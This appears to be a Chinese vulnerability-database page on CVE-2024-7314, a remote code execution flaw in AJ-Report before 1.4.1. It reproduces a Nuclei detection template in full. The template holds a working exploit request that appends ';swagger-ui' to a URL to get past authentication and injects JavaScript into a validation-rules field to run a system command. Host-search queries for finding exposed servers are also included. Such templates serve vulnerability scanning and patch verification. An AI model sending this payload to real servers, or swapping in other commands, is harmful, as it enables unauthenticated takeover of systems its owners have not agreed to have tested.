CVE-2024-7314: AJ-Report < 1.4.1 - Remote Code Execution

日期: 2025-08-01 | 影响软件: A J Report | POC: 已公开

漏洞描述

AJ-Report before version 1.4.1 is affected by an authentication bypass vulnerability. A remote and unauthenticated attacker can append ";swagger-ui" to HTTP requests to bypass authentication and execute arbitrary Java code on the victim server through script engine injection in the validation rules functionality.

PoC代码[已公开]

id: CVE-2024-7314

info:
  name: AJ-Report < 1.4.1 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    AJ-Report before version 1.4.1 is affected by an authentication bypass vulnerability. A remote and unauthenticated attacker can append ";swagger-ui" to HTTP requests to bypass authentication and execute arbitrary Java code on the victim server through script engine injection in the validation rules functionality.
  remediation: |
    Upgrade to AJ-Report version 1.4.1 or later which includes security fixes.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/aj-report/CNVD-2024-15077
    - https://github.com/yuebusao/AJ-REPORT-EXPLOIT
    - https://xz.aliyun.com/t/14460
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-280
    epss-score: 0.70098
    epss-percentile: 0.9863
    cve-id: CVE-2024-7314
    cpe: cpe:2.3:a:anji-plus:report:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: anji-plus
    product: report
    fofa-query: app="AJ-Report"
    shodan-query: http.title:"AJ-Report"
  tags: cve,cve2024,aj-report,anji-plus,rce,swagger,vkev

http:
  - raw:
      - |
        POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8

        {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
          - 'data":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
# digest: 4b0a00483046022100cdcd797210ca1889c94d6849675e8add14a8b93bb0af578f064173e273a9b0aa022100c542782810efff942059b630dee74f73e4cdede8d62d300d42bf4dd97d6085c1:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-7314.yaml

相关漏洞推荐